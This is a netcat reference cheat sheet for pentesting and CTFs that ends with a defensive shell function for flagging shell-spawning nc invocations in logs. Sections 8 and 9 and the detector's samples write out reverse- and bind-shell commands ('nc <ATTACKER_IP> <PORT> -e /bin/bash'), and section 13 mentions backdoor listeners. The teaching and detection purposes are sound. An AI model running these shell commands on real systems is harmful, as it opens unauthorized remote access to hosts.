1. INTRODUCTION
Netcat (nc) is a versatile networking tool used for reading/writing data over TCP or UDP.
It can function as:
- Client
- Server
- File transfer utility
- Banner grabber
- Reverse/bind shell handler
- Port scanner
Often called the “Swiss Army Knife” of networking.
2. BASIC CONNECTION
Connect to a TCP port:
```bash
nc <IP> <PORT>
```
Example:
```bash
nc 192.168.1.10 80
```
Use this to manually interact with services (HTTP, SMTP, FTP, custom servers).
3. LISTENING MODE (SERVER)
Start a TCP listener:
```bash
nc -l -p <PORT>
```
Example:
```bash
nc -l -p 4444
```
Used for:
- Wait for reverse shells
- Receive file transfers
- Chat sessions
4. SEND & RECEIVE FILES
Send a file:
```bash
nc <IP> <PORT> < file.txt
```
Receive a file:
```bash
nc -l -p <PORT> > received.txt
```
Example:
Sender:
```bash
nc 10.10.10.5 9001 < secret.zip
```
Receiver:
```bash
nc -l -p 9001 > secret.zip
```
5. CHAT SESSION (PEER-TO-PEER)
Machine A:
```bash
nc -l -p 5000
```
Machine B:
```bash
nc <IP_OF_A> 5000
```
Useful for:
- Quick communication
- Testing network connections
6. BANNER GRABBING
Read service banner:
```bash
nc <HOST> <PORT>
```
Example:
```bash
nc example.com 25
```
Useful for identifying:
- SMTP/FTP versions
- Web server banners
- Custom protocols (CTFs!)
7. PORT SCANNING
Simple port scan:
```bash
nc -zv <IP> <PORT-RANGE>
```
Example:
```bash
nc -zv 192.168.1.10 1-1000
```
Flags:
- `-z` : scan mode (zero-I/O: checks whether the port accepts a connection without sending data)
- `-v` : verbose output
8. REVERSE SHELL
Victim → Attacker (Victim initiates connection)
Victim:
```bash
nc <ATTACKER_IP> <PORT> -e /bin/bash
```
Attacker:
```bash
nc -l -p <PORT>
```
Example:
Victim:
```bash
nc 10.10.10.5 4444 -e /bin/bash
```
Attacker:
```bash
nc -l -p 4444
```
9. BIND SHELL
Victim listens, attacker connects.
Victim:
```bash
nc -l -p 4444 -e /bin/bash
```
Attacker:
```bash
nc <VICTIM_IP> 4444
```
10. UDP MODE
Send UDP packet:
```bash
nc -u <IP> <PORT>
```
Listen on UDP:
```bash
nc -u -l -p <PORT>
```
Example:
```bash
nc -u 192.168.1.10 53
```
Useful for testing:
- DNS
- VoIP services
- Custom UDP protocols
11. SENDING RAW / HEX DATA
Send raw bytes:
```bash
echo -n -e "\x41\x42\x43" | nc <IP> <PORT>
```
Useful for:
- Fuzzing
- Protocol testing
- Exploit development
12. TIMEOUTS
Set timeout for connections:
```bash
nc -w <SECONDS> <IP> <PORT>
```
Example:
```bash
nc -w 3 10.10.10.5 80
```
13. REAL PENTEST & CTF USE CASES
- Banner grabbing for version enumeration
- Receiving reverse shells from exploited servers
- Transferring privesc scripts (linpeas/winpeas)
- Testing firewall rules (TCP/UDP)
- Backdoor listeners on compromised hosts
- Quick chat channels for team coordination
- Scanning ports in restricted environments
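
From the defender's side, the invocations in sections 3, 7, 8 and 9 can be told apart by their flags alone. The following is an added example, not part of the original cheat sheet: a POSIX shell function that classifies logged netcat command lines and flags those that attach a shell to a socket. The function names, the modelled flag set (-l -e -z -u -p -w) and the sample lines using 192.0.2.x documentation addresses are assumptions made for illustration.

```bash
# Added example: classify a logged netcat command line by the flags used in this
# cheat sheet. It only parses text and never runs netcat (flag set is an assumption).
classify_nc() {
    set -f; set -- $1; set +f          # split the command line on whitespace
    case "${1##*/}" in
        nc|ncat|netcat|nc.traditional) shift ;;
        *) echo "not-netcat"; return 0 ;;
    esac
    nc_listen=0; nc_exec=0; nc_scan=0; nc_udp=0
    for nc_arg in "$@"; do
        case "$nc_arg" in
            -[!-]*) nc_rest=${nc_arg#-} ;;
            *) continue ;;                 # hosts, ports, option values
        esac
        while [ -n "$nc_rest" ]; do        # walk a cluster such as -zv or -lvp
            nc_c=${nc_rest%"${nc_rest#?}"}; nc_rest=${nc_rest#?}
            case "$nc_c" in
                l) nc_listen=1 ;;
                z) nc_scan=1 ;;
                u) nc_udp=1 ;;
                e) nc_exec=1; break ;;     # rest of the token is the program path
                p|w) break ;;              # rest of the token is a port or timeout
            esac
        done
    done
    if   [ "$nc_exec" -eq 1 ] && [ "$nc_listen" -eq 1 ]; then nc_kind=bind-shell
    elif [ "$nc_exec" -eq 1 ]; then nc_kind=reverse-shell
    elif [ "$nc_scan" -eq 1 ]; then nc_kind=port-scan
    elif [ "$nc_listen" -eq 1 ]; then nc_kind=listener
    else nc_kind=client
    fi
    if [ "$nc_udp" -eq 1 ]; then nc_kind="$nc_kind/udp"; fi
    echo "$nc_kind"
}
# Read command lines on stdin; print only those that hand a shell to a socket.
flag_shells() {
    while IFS= read -r nc_line; do
        case "$(classify_nc "$nc_line")" in
            bind-shell*|reverse-shell*) echo "ALERT $nc_line" ;;
        esac
    done
}
# Constructed sample command lines (192.0.2.x is a documentation range).
flag_shells <<'EOF'
/usr/bin/nc -zv 192.0.2.10 1-1000
nc 192.0.2.5 4444 -e /bin/bash
nc -l -p 4444 -e /bin/bash
EOF
```

In practice the input would be the command-line field of process-creation or audit logs; a plain listener or client is reported but not alerted on, since those are also normal administrative use.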